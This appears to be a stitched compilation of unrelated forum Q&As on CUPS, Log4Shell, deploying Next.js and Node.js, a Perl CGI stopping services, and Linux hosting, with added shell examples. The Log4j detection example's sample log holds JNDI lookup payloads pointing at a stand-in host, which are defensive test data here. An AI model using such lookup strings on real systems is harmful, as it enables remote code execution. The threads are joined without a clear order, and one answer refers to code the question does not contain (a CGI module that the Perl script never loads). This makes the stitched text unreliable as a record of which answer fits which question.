I'm wondering how the Common Unix Printing System (CUPS) handles user actions and affects the configuration files. From my humble background, a web page can only access/edit files when there is some web server and a server-side script, so how does it work without installing a web server?
Does it work through some shell script? If yes, how does that occur?
It is not the web frontend that alters the configuration files. At least not if you compare it to the 'typical' setup: HTTP server, scripting engine, script.
CUPS itself contains a daemon, which also acts as a minimal web server. That daemon has control over the configuration files, and it is free to accept commands from some web client it serves. So no magic here.
Turning that around, you could also set up a system running a 'normal' HTTP server with such rights that it is able to alter all system configuration files. That's all a question of how that server/daemon is set up and started. It breaks down to simple rights management. You certainly do not want to do that, though ;-)
What I do not understand from the Log4Shell problems... Let's say we have a simple program which uses the log4j module.
Is this program, which doesn't serve anything like a web server or any application which serves an application to the internet/network, vulnerable in any way?
Regards
Ubbu
ANY application that uses log4j2 can be vulnerable, including desktop applications which don't serve anything to the internet, as long as the executing system has a connection to the internet enabled.
Reason:
The application is vulnerable when it logs a certain String. This could be, e.g., the content of a file you open with a Java desktop application. If you are tricked into opening a prepared file with a known vulnerable desktop application, just opening the file will log the String. This will load arbitrary code from the internet (almost any device is constantly connected to the internet) and execute that code on your machine.
So yes, any Java application might be affected. Not limited to server applications serving web content.
IF your program has only static log messages, it is not exploitable. But almost any program logs some kind of "user" input. It's just that you don't always know that you are providing input to a program right now.
Obviously not. ;)
But if you have a connection to the internet later on then it would be :)
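The answer above turns on one observation: the danger is a lookup string reaching the logger, whatever path it took (a file name, a document title, a request header). The following is an added example, not code from the thread, showing a defender's first-pass check over application logs for that lookup prefix. The log file and its lines are constructed here for illustration; the function and variable names are my own.

```shell
#!/bin/sh
# Added example, not code from the thread above: a first-pass check that
# flags log lines carrying a Log4j lookup string of the kind the answer
# describes (a string that, once logged by a vulnerable log4j2 version,
# makes the application fetch and run remote code). It runs over a
# constructed sample log; file name and contents are made up here.

# Literal prefix of a JNDI lookup. It is kept in single quotes so the shell
# does not treat it as a parameter expansion, and matched with grep -F so
# the dollar sign and braces are plain characters rather than regex syntax.
JNDI_PATTERN='${jndi:'

# Print every line of the log file given as $1 that contains the prefix
# (case-insensitive, with its line number). Returns 0 even when nothing
# matches, because grep alone exits 1 on no match.
find_jndi_lookups() {
    grep -inF "$JNDI_PATTERN" "$1" || true
}

# Print the number of matching lines in the log file given as $1.
count_jndi_lookups() {
    grep -icF "$JNDI_PATTERN" "$1" || true
}

# Constructed sample: a desktop application logging the title of a document
# it opened and some request headers; two of the lines carry the lookup.
SAMPLE_LOG=$(mktemp)
trap 'rm -f "$SAMPLE_LOG"' EXIT
cat >"$SAMPLE_LOG" <<'EOF'
2021-12-10 12:00:01 INFO  Opened document report.docx
2021-12-10 12:00:02 INFO  Document title: ${jndi:ldap://example.invalid/x}
2021-12-10 12:00:03 INFO  User-Agent: Mozilla/5.0 (X11; Linux x86_64)
2021-12-10 12:00:04 WARN  X-Api-Version: ${JNDI:rmi://example.invalid/y}
2021-12-10 12:00:05 INFO  Opened document notes.txt
EOF

echo "Suspicious lines: $(count_jndi_lookups "$SAMPLE_LOG")"
find_jndi_lookups "$SAMPLE_LOG"
```

A literal match like this catches the plain form only; log4j's nested lookups can rewrite the prefix, so treat a hit as confirmation and a miss as inconclusive, and rely on upgrading log4j2 rather than on log scanning for the actual fix.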
I've been developing a Next.js website locally and now want to set it up on my Apache server (with cPanel). However, I'm very new to Next.js and Node apps and not too sure how to go about it.
Has anyone done this successfully? Can you list the required steps and what files should be on the server?
Also, can this be done on a subdomain?
Thank you!
To start with some clear terms just so we're on the same page, there are two or three very different things people mean when they say "server":
A Server Machine is a computer that is connected to the internet that you intend to use to serve something to people on the internet.
A Server Program is some software you run on your Server Machine. The job of the Server Program is to actually calculate the responses to various requests.
A Server as a Service is a webapp provided by a company that stores your code and then puts it onto Server Machines with the right Server Program as needed.
While we're here, let's also define:
A Programming Language is the language your website is written in. Some sites have no language (and are just raw HTML/CSS files that are meant to be returned directly to the user). Many sites, though, have some code that should be run on the server and then the result of that code should be returned to the user.
In your case, you have a Machine whose condition we don't know other than that it is running the Program Apache (or probably "Apache HTTP Server"). Apache HTTP server is very old and proven and pretty good at serving raw files back to users. It can also run some Programming Languages like PHP and return the result.
However, Next.JS is built on top of the Programming Language Javascript, which Apache does not have the ability to run. Next.JS instead wants its Server Program to be Node.
So the problem here is basically that you have a hammer, but only screws. You can't use the tool you have, Apache, to solve the problem you need solved, running Node code and returning the result. To get around this you have two options:
First, you can find a way to access the Server Machine that is currently running Apache and tell it, instead, to run Node pointed at your Next.JS code whenever it starts up. This might not be possible, depending on who owns this machine and how they've set it up.
Second, and probably easier, is to abandon this Machine and instead use a Server as a Service. Heroku, AWS, and Netlify all support Next.JS and have a free tier. The easiest solution, though, is probably to just deploy it on Vercel, which is a Server as a Service run by the same team that makes Next.JS and which has a very generous free tier for you to get started with.
The good news, though, is that yes next.js does totally support being hosted from a subdomain.
Next.JS allows you to build fully functional Node applications, as well as simple statically-generated sites like Jekyll or DocPad. If your use case is a simple statically generated site, look here: https://nextjs.org/docs/advanced-features/static-html-export
In particular, the next build && next export command will create all the HTML and assets necessary to host a site directly via an HTTP server like Apache or Nginx. Contents will be output to an out directory that could serve as the server root.
Pay very close attention to what features are not supported via this approach.
My aim is to start/stop services (like httpd, sshd, iptables, etc.) from a Perl CGI script.
#!/usr/bin/perl
use strict;
use warnings;
print "content-type:text/html\n\n";
print <<EOM;
<html>
<body>
EOM
`/etc/init.d/httpd stop`;
my $res=`/etc/init.d/httpd status`;
print <<EOM;
<h3>$res</h3>
</body>
</html>
EOM
Here the first command inside backticks isn't working, whereas the second command, which is assigned to $res, is working.
Output on the browser is as follows:
httpd (pid 15657) is running...
I suggest displaying the output from the stop command. I strongly suspect that you will see an error indicating that you do not have permission to stop the service.
A correctly configured web server process will be owned by a user that has almost no permissions on the system. This is a security feature. CGI programs on your web server can be run by anyone who can access the web server. For that reason, the web server user is usually configured to only run a very limited set of programs.
Starting and stopping your web server is something that you will usually need root permissions for. Your web server process will not have root permissions (for, hopefully, obvious reasons). But it's entirely possible that every user on the system (including the web server user) will have permissions to get the status of the web server process. This is why your httpd status command works, while the httpd stop command doesn't.
You could give the web server user temporary permission to start or stop services, using sudo or something like that. But you would need to do it very carefully - perhaps requiring a password on the web page (and transmitting that password securely over https).
But it's probably a better idea to reconsider this approach completely.
Can I also point out that it's a bad idea to use backticks to run external commands when you don't want to collect the output. In cases like that, it will be more efficient to use the system() function.
I also note, that you are loading the CGI module, but not using any of its functionality. You even manually create your Content-Type header, ignoring the module's header() function.
And here's my traditional admonition that writing new CGI programs in 2017 is a terrible idea. Please read CGI::Alternatives and consider a PSGI-based approach instead.
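The answer's first suggestion is to stop discarding what the stop command says. The following is an added example, not code from the question or the answer, showing from the shell what a CGI should capture: stdout, stderr and the exit status of the command, plus the account it ran as, so a refused "stop" is visible rather than silent. The function names and the constructed failing command are my own.

```shell
#!/bin/sh
# Added example, not code from the thread above: run a service-control
# command the way the answer recommends, keeping its stderr and exit status
# instead of throwing them away as a bare backtick call in the CGI does,
# and record which account it ran as. The sample failing command below is
# constructed for illustration.

# Run the command given as arguments. Its stdout lands in $RUN_OUT, its
# stderr in $RUN_ERR, and the function returns the command's exit status.
run_captured() {
    out_file=$(mktemp)
    err_file=$(mktemp)
    rc=0
    "$@" >"$out_file" 2>"$err_file" || rc=$?
    RUN_OUT=$(cat "$out_file")
    RUN_ERR=$(cat "$err_file")
    rm -f "$out_file" "$err_file"
    return "$rc"
}

# Print a plain-text report of what the command did, suitable for copying
# into a CGI response body, and return the command's exit status.
report_action() {
    status=0
    run_captured "$@" || status=$?
    printf 'command : %s\n' "$*"
    printf 'ran as  : uid %s (%s)\n' "$(id -u)" "$(id -un)"
    printf 'exit    : %s\n' "$status"
    printf 'stdout  : %s\n' "$RUN_OUT"
    printf 'stderr  : %s\n' "$RUN_ERR"
    return "$status"
}

# Stand-alone demonstration with a constructed command that behaves like a
# refused init script: nothing on stdout, a complaint on stderr, exit 1.
# Under the web-server account, /etc/init.d/httpd stop would be reported
# the same way, with the real refusal in the stderr line.
report_action sh -c 'echo "httpd: permission denied" >&2; exit 1' || true
```

In Perl the same capture is what system() with the exit status in $? gives you; the point is that a non-zero exit and a stderr message are the evidence the answer asks you to look at before considering any privilege changes.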
You should not even think of having a CGI script which has the privileges to start/stop services on a computer. There are, of course, valid reasons to want to have remote control over servers, but if giving the HTTP daemon super user privileges is the only way you can think of achieving that end, you need to realize that you ought not to be the person implementing that functionality.
I'm looking at an existing website, deployed on an NFS server. I'd like to rewrite some portions of it to run on nodejs. As far as I can tell, nodejs isn't supported by the NFS folk, but I am constrained to using their servers.
So, is there a way to shoe-horn nodejs onto a nearlyfreespeech server? Has anyone tried this successfully?
As of 24 September 2014, NFS now supports persistent processes:
Intro and overview - More power, more control, more insight, less cost
Official example - How-To: Django on NearlyFreeSpeech.NET
3rd party example - Run node.js on NearlyFreeSpeech.Net
To summarise the process described in mopsled.com's third-party example:
1) In NFS.N's admin UI, select your site's domain shortname under Sites, then change that site's "Server Type" to "Custom" instead of PHP / Apache.
2) Put your Node server code somewhere in /home/protected/
3) Create a shell script (e.g. run.sh) file somewhere in /home/protected/ that contains the command(s) to start your server (e.g. npm run start or node server.js). NFS.N will automatically run this script as a continuous process using a "Daemon", which we'll configure in the next step.
4) Select "Daemons" in your site's NFS.N admin UI, and enter your server's startup shell script path in the "command line" field. Complete the other fields as you see fit.
5) NFS.N will now ensure that your custom server process will run indefinitely. Your web server will now be available at the port your server listens at. However, NFS.N doesn't give root access for your server to communicate through the normal "low-level" internet ports (e.g. :80 and :443), so if you want to serve those, you must use NFS.N's "Proxy" feature described in the next step.
6) If you need to listen on low-level ports: select "Add a Proxy" in your site's NFS.N admin UI and enter the relevant settings, checking the "Bypass Apache entirely" option and giving the port your server is listening on for the "Target Port" option.
That's it! You can now stop/restart the server's continuous process (the shell script that the Daemon is maintaining) in the Daemon's configuration page.
NFS.net have a new "NFGI" architecture that may open the possibility to this:
NFGI can be made to work with other languages as well, making them first-class citizens of our service, just as fast and integrated as PHP currently is. This paves the way for making all sorts of frameworks viable that have traditionally been too slow when run through CGI. Rails. Catalyst. Django. We also believe it can be leveraged to make node.js work on our service, but we’re not 100% sure about that.
(Source: http://blog.nearlyfreespeech.net/2013/09/21/cgissh-upgrades/)
If you want this feature you can vote for it in their feature request system at https://members.nearlyfreespeech.net/support/voting
Although to be honest, I concur with earlier answers, using Node via CGI would lose some of the benefit...but would not be without its charms. Something like http://larsjung.de/node-cgi/ for NFS.net would be an interesting JavaScript replacement for PHP.
The problem is not that NFS.net will not support NodeJS. The thing is that you can't have "long running processes", i.e. servers. Since you can't run servers, you can't run Node.
In fact, the only way you can have anything dynamic there is by using CGI. There's no reason why a JavaScript engine could not be used to generate pages in response to requests, but I am not sure that can be done with node.
I work mostly on desktop applications on the Windows platform. Now I am focusing on the Linux platform to host web applications.
While hosting the application on Linux, I don't follow any procedure. I simply CHECKOUT the files from SVN and run the application in my home directory. I don't know where to store the application data (example: MySQL/Postgres or MongoDB or Redis, Tokyo Tyrant), or where to keep the log files. What tips do you have for when we do backend maintenance work on the server but display a 'maintenance in progress' message to the user?
How do you host your application on VPS/dedicated/cloud service running Linux application?
Do you have any checklist? Do you have any tips & tricks?
Very broad question
Where do you store application data? Most people would install MySQL, which would properly store the data in /var/lib/mysql, and Apache, where /var/www is typically used. These applications are usually configured in /etc/apache2 and /etc/mysql.
Where to keep log files? These almost always go into /var/log. For configuration, check /etc/syslog.conf.
How do you configure a server maintenance message? Create an HTML file with your message and serve it by configuring Apache from /etc/apache2/httpd.conf.
How to do virtual Linux servers? The easiest way is to install an instance on Amazon EC2, or you could use Oracle's VirtualBox (similar to VMware, but free). You could also try Xen/KVM, but these are far from trivial, so unless you have a Linux maven around I would stay clear of these.
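The maintenance-message answer above says to serve an HTML file through Apache's configuration but does not say how to switch it on and off without editing httpd.conf each time, or what status code to return. The following is an added example, not code from the answer, that does it with a generated .htaccess and answers 503 with a Retry-After header, so search engines and uptime monitors treat the outage as temporary instead of indexing or caching the maintenance page as the real site. It assumes mod_rewrite and mod_headers are loaded and that the site's directory has AllowOverride permitting these rules; the file names and the admin address are my own choices.

```shell
#!/bin/sh
# Added example, not code from the answer above: toggle a "maintenance in
# progress" page for a site served by Apache. Assumes mod_rewrite and
# mod_headers are loaded and AllowOverride permits .htaccess rules in the
# document root; the page and backup file names are assumed too.

MAINT_PAGE="maintenance.html"     # page shown to visitors (assumed name)
BACKUP_SUFFIX=".pre-maintenance"  # where an existing .htaccess is kept

# Turn maintenance mode on for the document root given as $1. An optional
# admin IP address in $2 keeps seeing the real site so the work can be
# checked before re-opening. Any existing .htaccess is saved first.
maintenance_on() {
    docroot=$1
    admin_ip=${2:-}
    if [ -f "$docroot/.htaccess" ] && [ ! -f "$docroot/.htaccess$BACKUP_SUFFIX" ]; then
        mv "$docroot/.htaccess" "$docroot/.htaccess$BACKUP_SUFFIX"
    fi
    if [ ! -f "$docroot/$MAINT_PAGE" ]; then
        printf '<!doctype html><title>Maintenance</title><h1>Maintenance in progress</h1>\n' \
            >"$docroot/$MAINT_PAGE"
    fi
    # Escape the dots in the address so the regex matches it literally.
    admin_re=$(printf '%s' "$admin_ip" | sed 's/\./\\./g')
    {
        printf '%s\n' "# generated by maintenance_on"
        printf '%s\n' "ErrorDocument 503 /$MAINT_PAGE"
        printf '%s\n' "Header always set Retry-After \"3600\" \"expr=%{REQUEST_STATUS} == 503\""
        printf '%s\n' "RewriteEngine On"
        if [ -n "$admin_re" ]; then
            printf '%s\n' "RewriteCond %{REMOTE_ADDR} !^${admin_re}\$"
        fi
        # The maintenance page itself must stay reachable for ErrorDocument.
        printf '%s\n' "RewriteCond %{REQUEST_URI} !^/$MAINT_PAGE\$"
        printf '%s\n' "RewriteRule ^ - [R=503,L]"
    } >"$docroot/.htaccess"
}

# Turn maintenance mode off: drop the generated rules and restore the saved
# .htaccess if there was one.
maintenance_off() {
    docroot=$1
    rm -f "$docroot/.htaccess"
    if [ -f "$docroot/.htaccess$BACKUP_SUFFIX" ]; then
        mv "$docroot/.htaccess$BACKUP_SUFFIX" "$docroot/.htaccess"
    fi
}

# Return 0 if the document root given as $1 is currently in maintenance mode.
is_maintenance() {
    grep -qs 'R=503' "$1/.htaccess"
}

# Stand-alone demonstration on a throwaway directory (constructed input);
# on a real host pass the site's DocumentRoot instead.
DEMO_ROOT=$(mktemp -d)
maintenance_on "$DEMO_ROOT" 203.0.113.7
cat "$DEMO_ROOT/.htaccess"
maintenance_off "$DEMO_ROOT"
rm -rf "$DEMO_ROOT"
```

Because only the rewrite rules change, the application files and the rest of the Apache configuration are untouched, and restoring the saved .htaccess on the way out means a site that already relied on one (for example, Options -Indexes) gets it back unchanged.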